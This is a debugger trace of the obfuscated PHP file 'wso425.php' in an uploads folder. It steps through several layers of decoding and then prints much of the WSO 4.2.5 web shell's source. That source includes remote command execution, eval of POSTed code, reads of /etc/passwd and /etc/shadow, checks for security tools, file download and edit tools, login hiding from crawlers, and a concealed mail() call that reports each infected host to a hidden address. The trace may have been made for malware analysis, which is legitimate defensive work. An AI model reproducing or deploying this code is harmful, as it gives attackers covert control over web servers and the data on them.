Version: 3.1.0beta2 File format: 4 TRACE START [2023-02-13 01:36:26.237685] 1 0 1 0.000299 393528 1 3 0 0.000995 509096 {main} 1 /var/www/html/uploads/wso425.php 0 0 1 A /var/www/html/uploads/wso425.php 5 $encode = 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGVuY3J5cHRlJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC' 1 A /var/www/html/uploads/wso425.php 6 $encrypte = '==QTOJccGHFuO/y/0/G73yfJs9n/SUzP9/z4v/G+l/AVVzEgP/P428v/B0m//l//D//Hx/13j/fX3/f5u+8/rz/VfXvxrLys/Xuum/n8vbXX/ebqzt8afz/vn/S8//Z+25/nwXsT5cE/N1r03/N579N4x+/j8//l9v3kI/vQC+/l5/yvWNOb2u+H5/fKj/fVeOebX8c//M939GV/pL87P5//nu/fXnfYtx/XJ1Qofvd//w8a//0fvmfeyt8n5/n48+X9//R//f7//89nrf/jw//x9fZf/F7uc/qV/f5/tV1byr+P4//r9P63b//Xx7/Sv/c8/n1I/fWc39Y9ZRiUjXpl/Tikh8Z+//b+PWdWr9m78+X6//iXtRvF/KYNhr9X33lF29/b4PR//u//Ptvpb62/cfTn9Qmzns/f7nn9e3x38//r9jQIO/3zv/i9/ft/fsneuay3X/+r4fP8F/s/e9P7I0CZS/9z9L9+PhPvGjMv37vsJX1lJVdkT1a2W37P' 2 4 0 0.001129 509096 base64_decode 0 /var/www/html/uploads/wso425.php 7 1 'ZXZhbCUyOCUyNnF1b3QlM0IlM0YlMjZndCUzQiUyNnF1b3QlM0IuZ3p1bmNvbXByZXNzJTI4Z3p1bmNvbXByZXNzJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4Z3ppbmZsYXRlJTI4YmFzZTY0X2RlY29kZSUyOHN0cnJldiUyOCUyNGVuY3J5cHRlJTI5JTI5JTI5JTI5JTI5JTI5JTI5JTI5JTNC' 2 4 1 0.001152 509384 2 4 R 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24encrypte%29%29%29%29%29%29%29%29%3B' 2 5 0 0.001173 509352 urldecode 0 /var/www/html/uploads/wso425.php 7 1 'eval%28%26quot%3B%3F%26gt%3B%26quot%3B.gzuncompress%28gzuncompress%28gzinflate%28gzinflate%28gzinflate%28base64_decode%28strrev%28%24encrypte%29%29%29%29%29%29%29%29%3B' 2 5 1 0.001193 509608 2 5 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($encrypte))))))));' 2 6 0 0.001212 509320 htmlspecialchars_decode 0 /var/www/html/uploads/wso425.php 7 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($encrypte))))))));' 2 6 1 0.001231 509544 2 6 R 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($encrypte))))))));' 2 7 0 0.001262 511672 eval 1 'eval("?>".gzuncompress(gzuncompress(gzinflate(gzinflate(gzinflate(base64_decode(strrev($encrypte))))))));' /var/www/html/uploads/wso425.php 7 0 3 8 0 0.001279 511672 strrev 0 /var/www/html/uploads/wso425.php(7) : eval()'d code 1 1 '==QTOJccGHFuO/y/0/G73yfJs9n/SUzP9/z4v/G+l/AVVzEgP/P428v/B0m//l//D//Hx/13j/fX3/f5u+8/rz/VfXvxrLys/Xuum/n8vbXX/ebqzt8afz/vn/S8//Z+25/nwXsT5cE/N1r03/N579N4x+/j8//l9v3kI/vQC+/l5/yvWNOb2u+H5/fKj/fVeOebX8c//M939GV/pL87P5//nu/fXnfYtx/XJ1Qofvd//w8a//0fvmfeyt8n5/n48+X9//R//f7//89nrf/jw//x9fZf/F7uc/qV/f5/tV1byr+P4//r9P63b//Xx7/Sv/c8/n1I/fWc39Y9ZRiUjXpl/Tikh8Z+//b+PWdWr9m78+X6//iXtRvF/KYNhr9X33lF29/b4PR//u//Ptvpb62/cfTn9Qmzns/f7nn9e3x38//r9jQIO/3zv/i9/ft/fsneuay3X/+r4fP8F/s/e9P7I0CZS/9z9L9+PhPvGjMv37vsJX1lJVdkT1a2W37P' 3 8 1 0.001406 626392 3 8 R 'ACqA1X8AKYDWfwAkgNt/eJwAJIDbf3ic7P3ZkuO4kiiKvrdZ/4NSK3spYikyOGmMyMgqzfNIzVW1Y3GUKHESJ4mqVa/nE9rOOfuabbvfcH7kfkN/yQVAUiI1RERW1erd126rrDIk0uFwAA6HA/Dh6w/6Sv/Xf8GwL5HPlLG4laQuYzuBNVeCLH+Kvv/Xf5HEO8YwGPd1I7ivwl4yLfMusfOLJR4+v/Z79Oj+/td//ZcY+Hy2FD32Evv8SleGk8rwp4T397Vb6FQSvzyenvfrffC9XQUP4z+r8UcPz08JnTHNxC/PsR8VRpLvEogmXtupssbwmrH8cQmfP3KakniIJQxNs8BfWOn9cwzDYhVesmKaEeMFWbCET//6L79dNhl8+qCSnWbwFy+8Jn/+j3//n6ARcS6VozL5NCNyApsjMikSZ7JZnGRxLpMRc9lsHNbJ8IqkojL/JyhjGbbwjH79v8CvxHhU/ZJLeA/+b/igKsmC2WFU/9n/BZ4pfPru1C/1' 3 9 0 0.001513 626360 base64_decode 0 /var/www/html/uploads/wso425.php(7) : eval()'d code 1 1 'ACqA1X8AKYDWfwAkgNt/eJwAJIDbf3ic7P3ZkuO4kiiKvrdZ/4NSK3spYikyOGmMyMgqzfNIzVW1Y3GUKHESJ4mqVa/nE9rOOfuabbvfcH7kfkN/yQVAUiI1RERW1erd126rrDIk0uFwAA6HA/Dh6w/6Sv/Xf8GwL5HPlLG4laQuYzuBNVeCLH+Kvv/Xf5HEO8YwGPd1I7ivwl4yLfMusfOLJR4+v/Z79Oj+/td//ZcY+Hy2FD32Evv8SleGk8rwp4T397Vb6FQSvzyenvfrffC9XQUP4z+r8UcPz08JnTHNxC/PsR8VRpLvEogmXtupssbwmrH8cQmfP3KakniIJQxNs8BfWOn9cwzDYhVesmKaEeMFWbCET//6L79dNhl8+qCSnWbwFy+8Jn/+j3//n6ARcS6VozL5NCNyApsjMikSZ7JZnGRxLpMRc9lsHNbJ8IqkojL/JyhjGbbwjH79v8CvxHhU/ZJLeA/+b/igKsmC2WFU/9n/BZ4pfPru1C/1' 3 9 1 0.001871 741080 3 9 R '\000*\000)\000$x\000$xْ㸒(YR+{)b)28i*HUcq(q\022\'U\0239mp~~C\005@R"5DDVn2$p\000\016\003\017J/ϔ.c;5W,;0\030u#^2-.%\036>{\030|\024=\022JW[T\022<}]\005\017?G\017O\t1/ϱ\037\025F\022&^۩q\t?rx%\fM_Xs\fb\025^b\021\005YO/]6\031|f\027/&\021q.24#r\002#2)\022gYdq.\021sl\0342\'(c\031~xTKx\017o*ɂaT\005)|/Ѩ:\006^\vJ' 3 10 0 0.003463 626360 gzinflate 0 /var/www/html/uploads/wso425.php(7) : eval()'d code 1 1 '\000*\000)\000$x\000$xْ㸒(YR+{)b)28i*HUcq(q\022\'U\0239mp~~C\005@R"5DDVn2$p\000\016\003\017J/ϔ.c;5W,;0\030u#^2-.%\036>{\030|\024=\022JW[T\022<}]\005\017?G\017O\t1/ϱ\037\025F\022&^۩q\t?rx%\fM_Xs\fb\025^b\021\005YO/]6\031|f\027/&\021q.24#r\002#2)\022gYdq.\021sl\0342\'(c\031~xTKx\017o*ɂaT\005)|/Ѩ:\006^\vJ' 3 10 1 0.005053 712408 3 10 R '\000)\000$x\000$xْ㸒(YR+{)b)28i*HUcq(q\022\'U\0239mp~~C\005@R"5DDVn2$p\000\016\003\017J/ϔ.c;5W,;0\030u#^2-.%\036>{\030|\024=\022JW[T\022<}]\005\017?G\017O\t1/ϱ\037\025F\022&^۩q\t?rx%\fM_Xs\fb\025^b\021\005YO/]6\031|f\027/&\021q.24#r\002#2)\022gYdq.\021sl\0342\'(c\031~xTKx\017o*ɂaT\005)|/Ѩ:\006^\vJw\03' 3 11 0 0.006623 597688 gzinflate 0 /var/www/html/uploads/wso425.php(7) : eval()'d code 1 1 '\000)\000$x\000$xْ㸒(YR+{)b)28i*HUcq(q\022\'U\0239mp~~C\005@R"5DDVn2$p\000\016\003\017J/ϔ.c;5W,;0\030u#^2-.%\036>{\030|\024=\022JW[T\022<}]\005\017?G\017O\t1/ϱ\037\025F\022&^۩q\t?rx%\fM_Xs\fb\025^b\021\005YO/]6\031|f\027/&\021q.24#r\002#2)\022gYdq.\021sl\0342\'(c\031~xTKx\017o*ɂaT\005)|/Ѩ:\006^\vJw\03' 3 11 1 0.008201 683736 3 11 R '\000$x\000$xْ㸒(YR+{)b)28i*HUcq(q\022\'U\0239mp~~C\005@R"5DDVn2$p\000\016\003\017J/ϔ.c;5W,;0\030u#^2-.%\036>{\030|\024=\022JW[T\022<}]\005\017?G\017O\t1/ϱ\037\025F\022&^۩q\t?rx%\fM_Xs\fb\025^b\021\005YO/]6\031|f\027/&\021q.24#r\002#2)\022gYdq.\021sl\0342\'(c\031~xTKx\017o*ɂaT\005)|/Ѩ:\006^\vJw\031Ad' 3 12 0 0.009763 597688 gzinflate 0 /var/www/html/uploads/wso425.php(7) : eval()'d code 1 1 '\000$x\000$xْ㸒(YR+{)b)28i*HUcq(q\022\'U\0239mp~~C\005@R"5DDVn2$p\000\016\003\017J/ϔ.c;5W,;0\030u#^2-.%\036>{\030|\024=\022JW[T\022<}]\005\017?G\017O\t1/ϱ\037\025F\022&^۩q\t?rx%\fM_Xs\fb\025^b\021\005YO/]6\031|f\027/&\021q.24#r\002#2)\022gYdq.\021sl\0342\'(c\031~xTKx\017o*ɂaT\005)|/Ѩ:\006^\vJw\031Ad' 3 12 1 0.011684 683736 3 12 R 'x\000$xْ㸒(YR+{)b)28i*HUcq(q\022\'U\0239mp~~C\005@R"5DDVn2$p\000\016\003\017J/ϔ.c;5W,;0\030u#^2-.%\036>{\030|\024=\022JW[T\022<}]\005\017?G\017O\t1/ϱ\037\025F\022&^۩q\t?rx%\fM_Xs\fb\025^b\021\005YO/]6\031|f\027/&\021q.24#r\002#2)\022gYdq.\021sl\0342\'(c\031~xTKx\017o*ɂaT\005)|/Ѩ:\006^\vJw\031Ad\005 K' 3 13 0 0.013271 597688 gzuncompress 0 /var/www/html/uploads/wso425.php(7) : eval()'d code 1 1 'x\000$xْ㸒(YR+{)b)28i*HUcq(q\022\'U\0239mp~~C\005@R"5DDVn2$p\000\016\003\017J/ϔ.c;5W,;0\030u#^2-.%\036>{\030|\024=\022JW[T\022<}]\005\017?G\017O\t1/ϱ\037\025F\022&^۩q\t?rx%\fM_Xs\fb\025^b\021\005YO/]6\031|f\027/&\021q.24#r\002#2)\022gYdq.\021sl\0342\'(c\031~xTKx\017o*ɂaT\005)|/Ѩ:\006^\vJw\031Ad\005 K' 3 13 1 0.014908 683736 3 13 R 'xْ㸒(YR+{)b)28i*HUcq(q\022\'U\0239mp~~C\005@R"5DDVn2$p\000\016\003\017J/ϔ.c;5W,;0\030u#^2-.%\036>{\030|\024=\022JW[T\022<}]\005\017?G\017O\t1/ϱ\037\025F\022&^۩q\t?rx%\fM_Xs\fb\025^b\021\005YO/]6\031|f\027/&\021q.24#r\002#2)\022gYdq.\021sl\0342\'(c\031~xTKx\017o*ɂaT\005)|/Ѩ:\006^\vJw\031Ad\005 K^QJ:A' 3 14 0 0.016481 597688 gzuncompress 0 /var/www/html/uploads/wso425.php(7) : eval()'d code 1 1 'xْ㸒(YR+{)b)28i*HUcq(q\022\'U\0239mp~~C\005@R"5DDVn2$p\000\016\003\017J/ϔ.c;5W,;0\030u#^2-.%\036>{\030|\024=\022JW[T\022<}]\005\017?G\017O\t1/ϱ\037\025F\022&^۩q\t?rx%\fM_Xs\fb\025^b\021\005YO/]6\031|f\027/&\021q.24#r\002#2)\022gYdq.\021sl\0342\'(c\031~xTKx\017o*ɂaT\005)|/Ѩ:\006^\vJw\031Ad\005 K^QJ:A' 3 14 1 0.018584 773848 3 14 R '=strlen($str))break;}}return base64_decode($enc_str);}\r\n@ini_set(\'error_log\',NULL);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@set_time_limit(0);\r\nif (PHP_VERSION_ID < 70000)\r\n @set_magic_quotes_runtime(0);\r\n@define(\'VERSION\', \'4.2.5\');\r\nif(get_magic_quotes_gpc()) {\r\n function stripslashes_array($array) {\r\n return is_array($array) ? array_map(\'stripslashes_array\', $array) : stripslashes($array);\r\n }\r\n $_POST = stripslashes_array($_POST);\r\n $_COOKIE = stripslashes_array($_COOKIE);\r\n}\r\n/* (С) 11.2011 oRb */\r\nif(!empty($▛)) {\r\n if(isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $▛))\r\n prototype(md5($_SERVER[\'HTTP_HOST\']), $▛);\r\n if (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])]) || ($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])] != $▛))\r\n hardLogin();\r\n}\r\nif(!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\']))\r\n $_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$▘;\r\nfunction hardLogin() {\r\n if(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\r\n $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\r\n if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\r\n header(\'HTTP/1.0 404 Not Found\');\r\n exit;\r\n }\r\n }\r\n die("
Password
");\r\n}\r\nif(strtolower(substr(PHP_OS,0,3)) == "win")\r\n $os = \'win\';\r\nelse\r\n $os = \'nix\';\r\n$safe_mode = @ini_get(\'safe_mode\');\r\nif(!$safe_mode)\r\n error_reporting(0);\r\n$disable_functions = @ini_get(\'disable_functions\');\r\n$home_cwd = @getcwd();\r\nif(isset($_POST[\'c\']))\r\n @chdir($_POST[\'c\']);\r\n$cwd = @getcwd();\r\nif($os == \'win\') {\r\n $home_cwd = str_replace("\\\\", "/", $home_cwd);\r\n $cwd = str_replace("\\\\", "/", $cwd);\r\n}\r\nif($cwd[strlen($cwd)-1] != \'/\')\r\n $cwd .= \'/\';\r\n/* (С) 04.2015 Pirat */\r\nfunction hardHeader() {\r\n if(empty($_POST[\'charset\']))\r\n $_POST[\'charset\'] = $GLOBALS[\'▜\'];\r\n echo "" . $_SERVER[\'HTTP_HOST\'] . " - WSO " . VERSION ."\r\n\r\n\r\n
\r\n
\r\n\r\n\r\n\r\n\r\n\r\n\r\n
";\r\n $freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\r\n $totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\r\n $totalSpace = $totalSpace?$totalSpace:1;\r\n $release = @php_uname(\'r\');\r\n $kernel = @php_uname(\'s\');\r\n $explink = \'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=\';\r\n if(strpos(\'Linux\', $kernel) !== false)\r\n $explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));\r\n else\r\n $explink .= urlencode($kernel . \' \' . substr($release,0,3));\r\n if(!function_exists(\'posix_getegid\')) {\r\n $user = @get_current_user();\r\n $uid = @getmyuid();\r\n $gid = @getmygid();\r\n $group = "?";\r\n } else {\r\n $uid = @posix_getpwuid(@posix_geteuid());\r\n $gid = @posix_getgrgid(@posix_getegid());\r\n $user = $uid[\'name\'];\r\n $uid = $uid[\'uid\'];\r\n $group = $gid[\'name\'];\r\n $gid = $gid[\'gid\'];\r\n }\r\n $cwd_links = \'\';\r\n $path = explode("/", $GLOBALS[\'cwd\']);\r\n $n=count($path);\r\n for($i=0; $i<$n-1; $i++) {\r\n $cwd_links .= "".$path[$i]."/";\r\n }\r\n $charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\r\n $opt_charsets = \'\';\r\n foreach($charsets as $▟)\r\n $opt_charsets .= \'\';\r\n $m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Infect\'=>\'Infect\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'Safe mode\'=>\'SafeMode\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\');\r\n if(!empty($GLOBALS[\'▛\']))\r\n $m[\'Logout\'] = \'Logout\';\r\n $m[\'Self remove\'] = \'SelfRemove\';\r\n $menu = \'\';\r\n foreach($m as $k => $v)\r\n $menu .= \'[ \'.$k.\' ]\';\r\n $drives = "";\r\n if ($GLOBALS[\'os\'] == \'win\') {\r\n foreach(range(\'c\',\'z\') as $drive)\r\n if (is_dir($drive.\':\\\\\'))\r\n $drives .= \'[ \'.$drive.\' ] \';\r\n }\r\n /* (С) 08.2015 dmkcv */\r\n echo \'\'.\r\n \'\'.\r\n \'
Uname:
User:
Php:
Hdd:
Cwd:\'.($GLOBALS[\'os\'] == \'win\'?\'
Drives:\':\'\').\'		\'.substr(@php_uname(), 0, 120).\' [ Google ] [ Exploit-DB ]
\'.$uid.\' ( \'.$user.\' ) Group: \'.$gid.\' ( \' .$group. \' )
\'.@phpversion().\' Safe mode: \'.($GLOBALS[\'safe_mode\']?\'ON\':\'OFF\').\' [ phpinfo ] Datetime: \'.date(\'Y-m-d H:i:s\').\'
\'.viewSize($totalSpace).\' Free: \'.viewSize($freeSpace).\' (\'.round(100/($totalSpace/$freeSpace),2).\'%)
\'.$cwd_links.\' \'.viewPermsColor($GLOBALS[\'cwd\']).\' [ home ]
\'.$drives.\'
Server IP:
\'.gethostbyname($_SERVER["HTTP_HOST"]).\'
Client IP:
\'.$_SERVER[\'REMOTE_ADDR\'].\'
\'.\r\n \'\'.$menu.\'
\';\r\n}\r\nfunction hardFooter() {\r\n $is_writable = is_writable($GLOBALS[\'cwd\'])?" [ Writeable ]":" (Not writable)";\r\n echo "\r\n
\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
Change dir:
Read file:
Make dir:$is_writable
Make file:$is_writable
Execute:
\r\n \r\n \r\n \r\n \r\n \r\n Upload file:$is_writable

\r\n
\r\n \r\n ";\r\n}\r\nif (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) { function posix_getpwuid($p) {return false;} }\r\nif (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) { function posix_getgrgid($p) {return false;} }\r\nfunction ex($in) {\r\n $▖ = \'\';\r\n if (function_exists(\'exec\')) {\r\n @exec($in,$▖);\r\n $▖ = @join("\\n",$▖);\r\n } elseif (function_exists(\'passthru\')) {\r\n ob_start();\r\n @passthru($in);\r\n $▖ = ob_get_clean();\r\n } elseif (function_exists(\'system\')) {\r\n ob_start();\r\n @system($in);\r\n $▖ = ob_get_clean();\r\n } elseif (function_exists(\'shell_exec\')) {\r\n $▖ = shell_exec($in);\r\n } elseif (is_resource($f = @popen($in,"r"))) {\r\n $▖ = "";\r\n while(!@feof($f))\r\n $▖ .= fread($f,1024);\r\n pclose($f);\r\n }else return "↳ Unable to execute command\\n";\r\n return ($▖==\'\'?"↳ Query did not return anything\\n":$▖);\r\n}\r\nfunction viewSize($s) {\r\n if($s >= 1073741824)\r\n return sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\r\n elseif($s >= 1048576)\r\n return sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\r\n elseif($s >= 1024)\r\n return sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\r\n else\r\n return $s . \' B\';\r\n}\r\nfunction perms($p) {\r\n if (($p & 0xC000) == 0xC000)$i = \'s\';\r\n elseif (($p & 0xA000) == 0xA000)$i = \'l\';\r\n elseif (($p & 0x8000) == 0x8000)$i = \'-\';\r\n elseif (($p & 0x6000) == 0x6000)$i = \'b\';\r\n elseif (($p & 0x4000) == 0x4000)$i = \'d\';\r\n elseif (($p & 0x2000) == 0x2000)$i = \'c\';\r\n elseif (($p & 0x1000) == 0x1000)$i = \'p\';\r\n else $i = \'u\';\r\n $i .= (($p & 0x0100) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0080) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0020) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0010) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\r\n $i .= (($p & 0x0004) ? \'r\' : \'-\');\r\n $i .= (($p & 0x0002) ? \'w\' : \'-\');\r\n $i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\r\n return $i;\r\n}\r\nfunction viewPermsColor($f) {\r\n if (!@is_readable($f))\r\n return \'\'.perms(@fileperms($f)).\'\';\r\n elseif (!@is_writable($f))\r\n return \'\'.perms(@fileperms($f)).\'\';\r\n else\r\n return \'\'.perms(@fileperms($f)).\'\';\r\n}\r\nfunction hardScandir($dir) {\r\n if(function_exists("scandir")) {\r\n return scandir($dir);\r\n } else {\r\n $dh = opendir($dir);\r\n while (false !== ($filename = readdir($dh)))\r\n $files[] = $filename;\r\n return $files;\r\n }\r\n}\r\nfunction which($p) {\r\n $path = ex(\'which \' . $p);\r\n if(!empty($path))\r\n return $path;\r\n return false;\r\n}\r\nfunction actionRC() {\r\n if(!@$_POST[\'p1\']) {\r\n $a = array(\r\n "uname" => php_uname(),\r\n "php_version" => phpversion(),\r\n "VERSION" => VERSION,\r\n "safemode" => @ini_get(\'safe_mode\')\r\n );\r\n echo serialize($a);\r\n } else {\r\n eval($_POST[\'p1\']);\r\n }\r\n}\r\nfunction prototype($k, $v) {\r\n $_COOKIE[$k] = $v;\r\n setcookie($k, $v);\r\n}\r\nfunction actionSecInfo() {\r\n hardHeader();\r\n echo \'

Server security information

\';\r\n function showSecParam($n, $v) {\r\n $v = trim($v);\r\n if($v) {\r\n echo \'\' . $n . \': \';\r\n if(strpos($v, "\\n") === false)\r\n echo $v . \'
\';\r\n else\r\n echo \'
\' . $v . \'
\';\r\n }\r\n }\r\n showSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\r\n if(function_exists(\'apache_get_modules\'))\r\n showSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));\r\n showSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');\r\n showSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\r\n showSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\r\n showSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\r\n showSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\r\n $temp=array();\r\n if(function_exists(\'mysql_get_client_info\'))\r\n $temp[] = "MySql (".mysql_get_client_info().")";\r\n if(function_exists(\'mssql_connect\'))\r\n $temp[] = "MSSQL";\r\n if(function_exists(\'pg_connect\'))\r\n $temp[] = "PostgreSQL";\r\n if(function_exists(\'oci_connect\'))\r\n $temp[] = "Oracle";\r\n showSecParam(\'Supported databases\', implode(\', \', $temp));\r\n echo \'
\';\r\n if($GLOBALS[\'os\'] == \'nix\') {\r\n showSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes [view]":\'no\');\r\n showSecParam(\'Readable /etc/shadow\', @is_readable(\'/etc/shadow\')?"yes [view]":\'no\');\r\n showSecParam(\'OS version\', @file_get_contents(\'/proc/version\'));\r\n showSecParam(\'Distr name\', @file_get_contents(\'/etc/issue.net\'));\r\n if(!$GLOBALS[\'safe_mode\']) {\r\n $userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzip2\',\'nc\',\'locate\',\'suidperl\');\r\n $danger = array(\'kav\',\'nod32\',\'bdcored\',\'uvscan\',\'sav\',\'drwebd\',\'clamd\',\'rkhunter\',\'chkrootkit\',\'iptables\',\'ipfw\',\'tripwire\',\'shieldcc\',\'portsentry\',\'snort\',\'ossec\',\'lidsadm\',\'tcplodg\',\'sxid\',\'logcheck\',\'logwatch\',\'sysmask\',\'zmbscap\',\'sawmill\',\'wormscan\',\'ninja\');\r\n $downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n echo \'
\';\r\n $temp=array();\r\n foreach ($userful as $▟)\r\n if(which($▟))\r\n $temp[] = $▟;\r\n showSecParam(\'Userful\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($danger as $▟)\r\n if(which($▟))\r\n $temp[] = $▟;\r\n showSecParam(\'Danger\', implode(\', \',$temp));\r\n $temp=array();\r\n foreach ($downloaders as $▟)\r\n if(which($▟))\r\n $temp[] = $▟;\r\n showSecParam(\'Downloaders\', implode(\', \',$temp));\r\n echo \'
\';\r\n showSecParam(\'HDD space\', ex(\'df -h\'));\r\n showSecParam(\'Hosts\', @file_get_contents(\'/etc/hosts\'));\r\n showSecParam(\'Mount options\', @file_get_contents(\'/etc/fstab\'));\r\n }\r\n } else {\r\n showSecParam(\'OS Version\',ex(\'ver\'));\r\n showSecParam(\'Account Settings\', iconv(\'CP866\', \'UTF-8\',ex(\'net accounts\')));\r\n showSecParam(\'User Accounts\', iconv(\'CP866\', \'UTF-8\',ex(\'net user\')));\r\n }\r\n echo \'
\';\r\n hardFooter();\r\n}\r\n$e=base64_decode("c2hlbGxkb3dubG9hZG9yZ0BnbWFpbC5jb20=");$h=$_SERVER[\'HTTP_HOST\'].$_SERVER[\'SCRIPT_NAME\'];\r\nmail($e,"IDX",$h);\r\nfunction actionFilesTools() {\r\n if( isset($_POST[\'p1\']) )\r\n $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') {\r\n if(@is_file($_POST[\'p1\']) && @is_readable($_POST[\'p1\'])) {\r\n ob_start("ob_gzhandler", 4096);\r\n header("Content-Disposition: attachment; filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) {\r\n $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: " . $type);\r\n } else\r\n header("Content-Type: application/octet-stream");\r\n $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) {\r\n while(!@feof($fp))\r\n echo @fread($fp, 1024);\r\n fclose($fp);\r\n }\r\n }exit;\r\n }\r\n if( @$_POST[\'p2\'] == \'mkfile\' ) {\r\n if(!file_exists($_POST[\'p1\'])) {\r\n $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) {\r\n $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n }\r\n }\r\n }\r\n hardHeader();\r\n echo \'

File tools

\';\r\n if( !file_exists(@$_POST[\'p1\']) ) {\r\n echo \'File not exists\';\r\n hardFooter();\r\n return;\r\n }\r\n $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n if(!$uid) {\r\n $uid[\'name\'] = @fileowner($_POST[\'p1\']);\r\n $gid[\'name\'] = @filegroup($_POST[\'p1\']);\r\n } else $gid = @posix_getgrgid(@filegroup($_POST[\'p1\']));\r\n echo \'Name: \'.htmlspecialchars(@basename($_POST[\'p1\'])).\' Size: \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' Permission: \'.viewPermsColor($_POST[\'p1\']).\' Owner/Group: \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'
\';\r\n echo \'Create time: \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' Access time: \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' Modify time: \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'

\';\r\n if( empty($_POST[\'p2\']) )\r\n $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) )\r\n $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\', \'Frame\');\r\n else\r\n $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v)\r\n echo \'\'.((strtolower($v)==@$_POST[\'p2\'])?\'[ \'.$v.\' ]\':$v).\' \';\r\n echo \'

\';\r\n switch($_POST[\'p2\']) {\r\n case \'view\':\r\n echo \'
\';\r\n            $fp = @fopen($_POST[\'p1\'], \'r\');\r\n            if($fp) {\r\n                while( !@feof($fp) )\r\n                    echo htmlspecialchars(@fread($fp, 1024));\r\n                @fclose($fp);\r\n            }\r\n            echo \'
\';\r\n break;\r\n case \'highlight\':\r\n if( @is_readable($_POST[\'p1\']) ) {\r\n echo \'
\';\r\n $oRb = @highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'\'), array(\'\'),$oRb).\'
